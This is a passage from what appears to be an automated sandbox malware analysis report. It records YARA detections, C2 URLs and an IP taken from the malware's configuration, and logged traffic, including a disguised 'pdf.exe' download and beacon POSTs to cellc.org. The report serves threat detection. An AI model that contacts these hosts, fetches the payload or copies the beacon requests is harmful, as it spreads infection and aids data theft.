                        Source: Yara matchFile source: 67.2.iexplore.exe.3300000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 66.2.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000003D.00000000.2500162285.0000000000401000.00000020.00000001.01000000.00000030.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000003.2544077192.000000000074B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000043.00000002.2902843382.0000000003300000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000000.2533489068.0000000000401000.00000020.00000001.01000000.00000031.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002E.00000003.2496650937.000001E8E8091000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000002.2546695187.0000000000401000.00000020.00000001.01000000.00000031.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000003D.00000002.2538043211.0000000000401000.00000020.00000001.01000000.00000030.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000002.2550012688.0000000000630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002E.00000003.2495171507.000001E8E7A12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, type: DROPPED
                        C2 URLs / IPs found in malware configuration
                        Source: Malware configuration extractorURLs: http://cellc.org/tmp/index.php
                        Source: Malware configuration extractorURLs: http://h-c-v.ru/tmp/index.php
                        Source: Malware configuration extractorURLs: http://icebrasilpr.com/tmp/index.php
                        Source: Malware configuration extractorURLs: http://piratia-life.ru/tmp/index.php
                        Source: Malware configuration extractorURLs: http://piratia.su/tmp/index.php
                        Source: Malware configuration extractorURLs: 193.149.176.178
                        Uses ping.exe to check the status of other devices and networks
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
                        Source: global trafficTCP traffic: 192.168.2.4:49751 -> 193.149.176.178:2404
                        Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                        Source: Joe Sandbox ViewIP Address: 104.21.79.229 104.21.79.229
                        Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                        Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                        Source: Joe Sandbox ViewASN Name: ALABANZA-BALTUS ALABANZA-BALTUS
                        Source: Joe Sandbox ViewASN Name: DANISCODK DANISCODK
                        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.149.176.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.149.176.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.149.176.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.149.176.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.149.176.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.149.176.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.149.176.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.149.176.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.149.176.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.149.176.178
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_00A0D95F InternetQueryDataAvailable,InternetReadFile,GetLastError,SetEvent,SetEvent,10_2_00A0D95F
                        Source: global trafficHTTP traffic detected: GET /1gFnW4 HTTP/1.1User-Agent: NathanHost: 2no.co
                        Source: global trafficHTTP traffic detected: GET /YourCreditScore-ReportFileNumber-73211fcf-78f6-daeb-5650-a152fc5bfdcd-431a0807-57f0-cc80-d209-2cpdf.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: makemoneyminds.com
                        Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.1
                        Source: global trafficDNS traffic detected: DNS query: 2no.co
                        Source: global trafficDNS traffic detected: DNS query: uqxOPcjzRTNSjLPJLsvEoGgENV.uqxOPcjzRTNSjLPJLsvEoGgENV
                        Source: global trafficDNS traffic detected: DNS query: cellc.org
                        Source: global trafficDNS traffic detected: DNS query: makemoneyminds.com
                        Source: global trafficDNS traffic detected: DNS query: blank-dvgxd.in
                        Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                        Source: global trafficDNS traffic detected: DNS query: ip-api.com
                        Source: unknownHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ywleoxljcxyhv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 244Host: cellc.org
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 08 May 2024 14:41:04 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 83 Data Ascii: r
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 08 May 2024 14:41:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 08 May 2024 14:41:07 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 08 May 2024 14:41:09 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 6b 4d f1 35 05 f5 fd 5e fe 97 ec ae 31 da 2d da f5 6c 63 1a 99 98 ac dc 61 d0 37 01 20 9c 0d 98 5c 2b 61 51 ad 94 67 e1 5d aa 4d 04 38 63 28 1e 90 21 a4 71 4d eb 99 28 63 ce 33 c8 f3 ef 39 24 d2 4f b0 5f c7 a5 0f 40 51 3e d6 1b b7 ac 9e 57 d5 99 2e 6b 2a bc a8 a9 c8 b3 84 99 26 bb 1f 18 bc df 99 a0 06 15 30 47 f6 94 b0 00 e7 9e 2d 23 c5 7c 85 fb 4a f3 a9 42 a0 Data Ascii: #\6kM5^1-lca7 \+aQg]M8c(!qM(c39$O_@Q>W.k*&0G-#|JB
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 08 May 2024 14:41:20 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 08 May 2024 14:41:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 08 May 2024 14:41:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 08 May 2024 14:41:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 08 May 2024 14:41:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                        Source: DE5A.exe, 00000015.00000003.2405374161.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2468233859.000001FEA7822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digi
                        Source: DE5A.exe, 00000015.00000003.2408547333.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2471211597.000001FEA7815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.co
                        Source: DE5A.exe, 00000015.00000003.2398538473.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405728605.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398744659.0000025F9EEE3000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397863706.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405471567.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406691220.0000025F9EEE4000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2408547333.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398642728.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398214140.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2404964950.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398437223.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397757654.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398121284.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398331494.0000025F9EEE3000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406836205.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406691220.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398331494.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405374161.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397974291.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2458319429.000001FEA7813000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2471211597.000001FEA7815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                        Source: explorer.exe, 00000012.00000000.2004825375.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.2006529919.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                        Source: DE5A.exe, 00000015.00000003.2398538473.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405728605.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397863706.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405471567.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2408547333.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398642728.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398214140.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2404964950.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398437223.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397757654.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398121284.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406836205.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406691220.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398331494.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405374161.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397974291.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2458319429.000001FEA7813000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2471211597.000001FEA7815000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2458495109.000001FEA7813000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2468424463.000001FEA7815000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2458790993.000001FEA7813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                        Source: DE5A.exe, 00000015.00000003.2398538473.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405728605.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397863706.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405471567.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2408547333.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398642728.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398214140.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2404964950.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398437223.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397757654.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398121284.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406836205.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406691220.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398331494.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405374161.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397974291.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2458319429.000001FEA7813000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2471211597.000001FEA7815000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2458495109.000001FEA7813000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 